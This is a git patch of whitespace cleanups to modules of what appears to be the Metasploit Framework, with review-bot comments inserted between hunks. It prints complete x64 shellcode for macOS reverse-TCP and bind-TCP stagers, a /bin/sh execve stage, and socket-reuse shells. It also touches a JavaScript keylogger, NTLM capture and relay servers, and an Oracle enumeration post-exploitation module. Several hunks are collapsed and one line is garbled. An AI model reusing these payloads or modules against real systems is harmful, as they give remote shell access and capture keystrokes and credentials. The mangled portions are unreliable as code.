From 201518b66f124c99f338f0034af0f5da26372392 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Wed, 17 Oct 2012 17:22:26 -0500
Subject: [PATCH] msftidy corrections
---
 .../capture/http_javascript_keylogger.rb | 4 +-
 modules/auxiliary/server/capture/http_ntlm.rb | 4 +-
 modules/auxiliary/server/http_ntlmrelay.rb | 4 +-
 .../singles/linux/x64/shell_find_port.rb | 80 ++++++------
 modules/payloads/singles/osx/x64/say.rb | 6 +-
 .../singles/osx/x64/shell_find_tag.rb | 70 +++++-----
 modules/payloads/stagers/osx/x64/bind_tcp.rb | 122 +++++++++---------
 .../payloads/stagers/osx/x64/reverse_tcp.rb | 26 ++--
 .../payloads/stages/osx/x64/dupandexecve.rb | 10 +-
 modules/post/windows/gather/enum_db.rb | 6 +-
 10 files changed, 166 insertions(+), 166 deletions(-)
diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb
index 9c4aed7cd3..76379b7fb6 100644
--- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb
+++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb
@@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
 print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
 end
- ::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
- ::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
+ ::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
+ ::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
 if nice.length > 0
 print_good("[#{cid}] Keys: #{nice}")
diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb
index 5888b37402..37600f2a6f 100644
--- a/modules/auxiliary/server/capture/http_ntlm.rb
+++ b/modules/auxiliary/server/capture/http_ntlm.rb
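Review bot: The rewritten `::File.open(` calls on the new side still carry a space after the opening parenthesis, which is exactly the spacing an msftidy pass is meant to normalize; `::File.open(@client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }` and the same form for the `:path_raw` line. The reason for switching to `"ab"` is not visible in the hunk and deserves a one-line comment above the two calls, e.g. `# binary mode: append the captured bytes verbatim, without newline translation`. If `cid` is derived from the client's request, the `:path_clean` / `:path_raw` values in `@client_cache` must be assigned server-side so a client cannot influence where the logs are written — that assignment is outside this hunk, as are the start and end of the enclosing method.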
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary def on_request_uri(cli, request) print_status("Request '#{request.uri}'...") - + case request.method when 'OPTIONS' process_options(cli, request) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary end exploit() end - + def process_options(cli, request) print_status("OPTIONS #{request.uri}") headers = { diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 8845535fe0..a23072a310 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary # Handles the initial requests waiting for the browser to try NTLM auth def on_request_uri(cli, request) - + case request.method when 'OPTIONS' process_options(cli, request) @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary parse_args() exploit() end - + def process_options(cli, request) print_status("OPTIONS #{request.uri}") headers = { diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 5b574a07d7..513c4751f1 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -38,50 +38,50 @@ module Metasploit3 'CPORT' => [ 32, 'n' ], }, - 'Assembly' => < %Q| + xor rdi,rdi + xor rbx,rbx + mov bl,0x14 + sub rsp,rbx + lea rdx,[rsp] + lea rsi,[rsp+4] + find_port: + push 0x34 ; getpeername + pop rax + syscall + inc rdi + cmp word [rsi+2],0x4142 + jne find_port + dec rdi + push 2 + pop rsi + dup2: + push 0x21 ; dup2 + pop rax + syscall + dec rsi + jns dup2 + mov rbx,rsi + mov ebx, 0x68732f41 + mov eax,0x6e69622f + shr rbx,8 + shl rbx,32 + or rax,rbx + push rax + mov rdi,rsp + xor rsi,rsi + mov rdx,rsi + push 0x3b ; execve + pop rax + syscall + | } )) end - def size - return 91 - end + def size + return 91 + end end 
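Review bot: In the shell_find_port.rb hunk, `size` still returns the literal `91` while the shellcode is assembled from the `Assembly` source at runtime, so the two can drift silently whenever the assembly is edited; a comment on `def size` such as `# must equal the assembled length of 'Assembly'; re-check after any change` would at least make the coupling visible. The `'CPORT' => [ 32, 'n' ]` offset in the context above has the same fragility, since it presumably has to track the byte position of the `0x4142` placeholder in `cmp word [rsi+2],0x4142` and nothing ties the two together. The `'Assembly' => < %Q|` line reads as garbled in this rendering, so I cannot tell whether the change replaced a heredoc with a `%Q|…|` literal; worth confirming that the module still parses and that the assembled length is unchanged. The http_ntlm.rb and http_ntlmrelay.rb hunks on this line are whitespace-only.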
diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
index 71473b145c..8c33032fee 100644
--- a/modules/payloads/singles/osx/x64/say.rb
+++ b/modules/payloads/singles/osx/x64/say.rb
@@ -38,10 +38,10 @@ module Metasploit3
 payload =
 "\x48\x31\xC0" + # xor rax,rax
 "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
- call +
- "/usr/bin/say\x00" +
+ call +
+ "/usr/bin/say\x00" +
 say +
- "\x48\x8B\x3C\x24" + # mov rdi,[rsp]
+ "\x48\x8B\x3C\x24" + # mov rdi,[rsp]
 "\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
 "\x48\x31\xD2" + # xor rdx,rdx
 "\x52" + # push rdx
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
index 885789552b..9a6d5a9871 100644
--- a/modules/payloads/singles/osx/x64/shell_find_tag.rb
+++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -44,41 +44,41 @@ module Metasploit3 cmd = (datastore['CMD'] || '') << "\x00" call = "\xe8" + [cmd.length].pack('V') - payload = - "\x48\x31\xFF" + # xor rdi,rdi - "\x57" + # push rdi - "\x48\x89\xE6" + # mov rsi,rsp - "\x6A\x04" + # push byte +0x4 - "\x5A" + # pop rdx - "\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2] - "\x4D\x31\xC0" + # xor r8,r8 - "\x4D\x31\xC9" + # xor r9,r9 - "\x48\xFF\xCF" + # dec rdi - "\x48\xFF\xC7" + # inc rdi - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x0F\x05" + # loadall286 - "\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f - datastore['TAG'] + - "\x75\xED" + # jnz 0x17 - "\x48\x31\xC9" + # xor rcx,rcx - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x0F\x05" + # loadall286 - "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a - "\x48\x31\xF6" + # xor rsi,rsi - "\x0F\x05" + # loadall286 - "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a - "\x48\xFF\xC6" + # inc rsi - "\x0F\x05" + # loadall286 - "\x48\x31\xC0" + # xor rax,rax - "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b - call + - cmd + - "\x48\x8B\x3C\x24" + # mov rdi,[rsp] - "\x48\x31\xD2" + # xor rdx,rdx - "\x52" + # push rdx - "\x57" + # push rdi - "\x48\x89\xE6" + # mov rsi,rsp - "\x0F\x05" # loadall286 + payload = + "\x48\x31\xFF" + # xor rdi,rdi + "\x57" + # push rdi + "\x48\x89\xE6" + # mov rsi,rsp + "\x6A\x04" + # push byte +0x4 + "\x5A" + # pop rdx + "\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2] + "\x4D\x31\xC0" + # xor r8,r8 + "\x4D\x31\xC9" + # xor r9,r9 + "\x48\xFF\xCF" + # dec rdi + "\x48\xFF\xC7" + # inc rdi + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x0F\x05" + # loadall286 + "\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f + datastore['TAG'] + + "\x75\xED" + # jnz 0x17 + "\x48\x31\xC9" + # xor rcx,rcx + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x0F\x05" + # loadall286 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\x31\xF6" + # xor rsi,rsi + "\x0F\x05" + # loadall286 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\xFF\xC6" + # inc rsi + "\x0F\x05" + # 
loadall286 + "\x48\x31\xC0" + # xor rax,rax + "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b + call + + cmd + + "\x48\x8B\x3C\x24" + # mov rdi,[rsp] + "\x48\x31\xD2" + # xor rdx,rdx + "\x52" + # push rdx + "\x57" + # push rdi + "\x48\x89\xE6" + # mov rsi,rsp + "\x0F\x05" # loadall286 end end diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 94c8e74529..99174393eb 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb 
@@ -27,67 +27,67 @@ module Metasploit3 { 'Offsets' => { 'LPORT' => [ 31, 'n'] }, 'Payload' => - "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061 - "\x6A\x02" + # push byte +0x2 - "\x5F" + # pop rdi - "\x6A\x01" + # push byte +0x1 - "\x5E" + # pop rsi - "\x48\x31\xD2" + # xor rdx,rdx - "\x0F\x05" + # loadall286 - "\x48\x89\xC7" + # mov rdi,rax - "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068 - "\x48\x31\xF6" + # xor rsi,rsi - "\x56" + # push rsi - "\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200 - "\x56" + # push rsi - "\x48\x89\xE6" + # mov rsi,rsp - "\x6A\x10" + # push byte +0x10 - "\x5A" + # pop rdx - "\x0F\x05" + # loadall286 - "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a - "\x48\x31\xF6" + # xor rsi,rsi - "\x48\xFF\xC6" + # inc rsi - "\x49\x89\xFC" + # mov r12,rdi - "\x0F\x05" + # loadall286 - "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e - "\x4C\x89\xE7" + # mov rdi,r12 - "\x48\x89\xE6" + # mov rsi,rsp - "\x48\x89\xE2" + # mov rdx,rsp - "\x48\x83\xEA\x04" + # sub rdx,byte +0x4 - "\x0F\x05" + # loadall286 - "\x49\x89\xC5" + # mov r13,rax - "\x48\x89\xC7" + # mov rdi,rax - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x48\x31\xC9" + # xor rcx,rcx - "\x51" + # push rcx - "\x48\x89\xE6" + # mov rsi,rsp - "\xBA\x04\x00\x00\x00" + # mov edx,0x4 - "\x4D\x31\xC0" + # xor r8,r8 - "\x4D\x31\xD2" + # xor r10,r10 - "\x0F\x05" + # loadall286 - "\x41\x5B" + # pop r11 - "\x4C\x89\xDE" + # mov rsi,r11 - "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000 - "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000 - "\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5 - "\x48\x31\xFF" + # xor rdi,rdi - "\x48\xFF\xCF" + # dec rdi - "\xBA\x07\x00\x00\x00" + # mov edx,0x7 - "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002 - "\x49\x89\xF8" + # mov r8,rdi - "\x4D\x31\xC9" + # xor r9,r9 - "\x0F\x05" + # loadall286 - "\x48\x89\xC6" + # mov rsi,rax - "\x56" + # push rsi - "\x4C\x89\xEF" + # mov rdi,r13 - "\x48\x31\xC9" + # xor rcx,rcx - "\x4C\x89\xDA" + # mov rdx,r11 - "\x4D\x31\xC0" + # xor r8,r8 - "\x4D\x31\xD2" 
+ # xor r10,r10 - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x0F\x05" + # loadall286 - "\x58" + # pop rax - "\xFF\xD0" # call rax + "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061 + "\x6A\x02" + # push byte +0x2 + "\x5F" + # pop rdi + "\x6A\x01" + # push byte +0x1 + "\x5E" + # pop rsi + "\x48\x31\xD2" + # xor rdx,rdx + "\x0F\x05" + # loadall286 + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068 + "\x48\x31\xF6" + # xor rsi,rsi + "\x56" + # push rsi + "\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200 + "\x56" + # push rsi + "\x48\x89\xE6" + # mov rsi,rsp + "\x6A\x10" + # push byte +0x10 + "\x5A" + # pop rdx + "\x0F\x05" + # loadall286 + "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a + "\x48\x31\xF6" + # xor rsi,rsi + "\x48\xFF\xC6" + # inc rsi + "\x49\x89\xFC" + # mov r12,rdi + "\x0F\x05" + # loadall286 + "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e + "\x4C\x89\xE7" + # mov rdi,r12 + "\x48\x89\xE6" + # mov rsi,rsp + "\x48\x89\xE2" + # mov rdx,rsp + "\x48\x83\xEA\x04" + # sub rdx,byte +0x4 + "\x0F\x05" + # loadall286 + "\x49\x89\xC5" + # mov r13,rax + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x48\x31\xC9" + # xor rcx,rcx + "\x51" + # push rcx + "\x48\x89\xE6" + # mov rsi,rsp + "\xBA\x04\x00\x00\x00" + # mov edx,0x4 + "\x4D\x31\xC0" + # xor r8,r8 + "\x4D\x31\xD2" + # xor r10,r10 + "\x0F\x05" + # loadall286 + "\x41\x5B" + # pop r11 + "\x4C\x89\xDE" + # mov rsi,r11 + "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000 + "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000 + "\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5 + "\x48\x31\xFF" + # xor rdi,rdi + "\x48\xFF\xCF" + # dec rdi + "\xBA\x07\x00\x00\x00" + # mov edx,0x7 + "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002 + "\x49\x89\xF8" + # mov r8,rdi + "\x4D\x31\xC9" + # xor r9,r9 + "\x0F\x05" + # loadall286 + "\x48\x89\xC6" + # mov rsi,rax + "\x56" + # push rsi + "\x4C\x89\xEF" + # mov rdi,r13 + "\x48\x31\xC9" + # xor rcx,rcx + "\x4C\x89\xDA" + # mov rdx,r11 + 
"\x4D\x31\xC0" + # xor r8,r8 + "\x4D\x31\xD2" + # xor r10,r10 + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x0F\x05" + # loadall286 + "\x58" + # pop rax + "\xFF\xD0" # call rax } )) end diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 5a78df166d..0370a881ba 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -31,19 +31,19 @@ module Metasploit3 'LPORT' => [ 35, 'n'] }, 'Payload' => - "\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + - "\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + - "\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + - "\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + - "\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + - "\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + - "\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + - "\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + - "\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + - "\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + - "\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + - "\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + - "\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" + "\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + + "\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + + "\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + + "\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + + "\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + + "\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + + "\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + + "\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + + "\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + + "\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + + "\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + + "\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + + "\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" } )) end 
diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index ddbfba85bf..9896416869 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -26,11 +26,11 @@ module Metasploit3 'Stage' => { 'Payload' => - "\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+ - "\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+ - "\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+ - "\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+ - "\x52\x57\x48\x89\xe6\x0f\x05" + "\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+ + "\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+ + "\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+ + "\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+ + "\x52\x57\x48\x89\xe6\x0f\x05" } )) end diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 36cf6e2b2f..29e130e40a 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Post found_key = false basekey_set = ["HKLM\\SOFTWARE\\Oracle\\SYSMAN","HKLM\\SOFTWARE\\ORACLE\\KEY_XE"] basekey_set.each do |basekey| - next if found_key + next if found_key instances = registry_enumkeys(basekey) if instances.nil? or instances.empty? next else found_key = true end - + instances.each do |i| if basekey.include?"KEY_XE" val_ORACLE_SID = registry_getvaldata(basekey,"ORACLE_SID") - val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME") + val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME") else key = "#{basekey}\\#{i}" val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")